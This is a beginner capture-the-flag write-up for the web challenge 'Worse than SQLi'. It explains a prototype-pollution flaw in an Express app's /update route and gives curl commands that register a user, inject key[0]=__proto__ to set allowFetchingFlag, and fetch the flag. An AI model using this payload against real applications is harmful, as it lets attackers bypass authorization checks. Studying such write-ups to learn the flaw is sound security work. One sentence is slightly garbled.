Web

Worse than SQLi

9/14/2025

by yeknom

07CTF-2025

WriteUp

Worse than SQLi

📋 Description

Just a beginner friendly web chall.

🔗 Given Files

app.js
Dockerfile

💡 Walkthough

Approach

Looked at routes. No body parser → req.body is undefined on POST (expected 500s if you hit them raw).
Two juicy bits:
- /getFlag only shows flag when config.allowFetchingFlag == "Yes".
- /update tries to support array-style updates and blindly assigns users[username][key[k]][v] = value[v], which enables prototype pollution using key[]=__proto__.
On the hosted instance, qs parsing lets us sneak through via the form arrays. We set , then visit .

Object.prototype.allowFetchingFlag = "Yes"

/getFlag

# Register a user (stores session cookie)
curl -i -c remote_cookies.txt -X POST \
  -d 'username=ppuser&password=pppass' \
  http://554ba769f0.ctf.0bscuri7y.xyz/register

# Prototype-pollute via /update to flip the in-memory gate
# key[0]=__proto__ and value[0][allowFetchingFlag]=Yes
curl -i -b remote_cookies.txt -X POST \
  -d 'key%5B0%5D=__proto__&value%5B0%5D%5BallowFetchingFlag%5D=Yes' \
  http://554ba769f0.ctf.0bscuri7y.xyz/update

# Grab the flag
curl -s -b remote_cookies.txt \
  http://554ba769f0.ctf.0bscuri7y.xyz/getFlag